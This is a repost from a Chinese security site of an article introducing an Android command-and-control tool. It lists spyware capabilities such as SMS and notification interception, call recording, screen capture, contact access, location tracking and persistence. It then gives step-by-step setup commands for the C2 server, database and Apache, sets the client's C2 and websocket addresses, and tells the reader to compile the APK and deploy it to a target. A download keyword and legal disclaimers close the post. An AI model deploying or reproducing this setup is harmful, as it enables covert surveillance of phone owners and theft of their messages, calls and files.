Android C2

admin
admin
admin
141215
文章
117
评论
2024年4月25日18:59:45评论15 views字数 1736阅读5分47秒阅读模式

特征

  • 通知监听器

  • 短信监听

  • 电话录音

  • 图像捕获和屏幕截图

  • 坚持

  • 读取和写入联系人

  • 列出已安装的应用程序

  • 下载和上传文件

  • 获取设备位置

安装

克隆存储库

安装 php、composer、mysql、php-mysql 驱动程序、apache2 和 a2enmod

将服务器文件移至/var/www/html/并安装依赖项

mv moukthar/Server/* /var/www/html/cd /var/www/html/c2-servercomposer installcd /var/www/html/web-ocket/composer installcd /var/wwwchown -R www-data:www-data .chmod -R 777 .

默认凭据是用户名:android和密码:the rastafarian in you

创建新的sql用户

CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';FLUSH PRIVILEGES;

c2-server/.env在和中设置数据库凭据web-socket/.env

执行database.sql

在 Linux 中启动 Web 套接字服务器或部署为服务

php Server/web-socket/App.php# ORsudo mv Server/websocket.service /etc/systemd/system/sudo systemctl daemon-reloadsudo systemctl enable websocket.servicesudo systemctl start websocket.service

调整/etc/apache2/sites-available/000-default.conf

<VirtualHost *:80>      ServerAdmin webmaster@localhost      DocumentRoot /var/www/html/c2-server      DirectoryIndex app.php      Options -Indexes      ErrorLog ${APACHE_LOG_DIR}/error.log      CustomLog ${APACHE_LOG_DIR}/access.log combined</VirtualHost>

调整/etc/apache2/apache2.conf 

Comment this section  #<Directory />  #       Options FollowSymLinks  #       AllowOverride None  #       Require all denied  #</Directory> Add this  <Directory /var/www/html/c2-server>      Options -Indexes      DirectoryIndex app.php      AllowOverride All      Require all granted  </Directory>

在 <script> 标记中设置 Web 套接字服务器地址c2-server/src/View/home.php

const ws = new WebSocket('ws://IP_ADDRESS:8080');

使用以下命令重新启动 apache

sudo a2enmod rewrite && sudo service apache2 restart

在客户端设置C2服务器和Web套接字服务器地址

functionality/Utils.javapublic static final String C2_SERVER = "http://localhost";public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";

使用 Android Studio 编译 APK 并部署到目标

Android C2

后台回复:240424,获取工具

Android C2

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。

原文始发于微信公众号(白帽学子):Android C2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月25日18:59:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Android C2https://cn-sec.com/archives/2686206.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息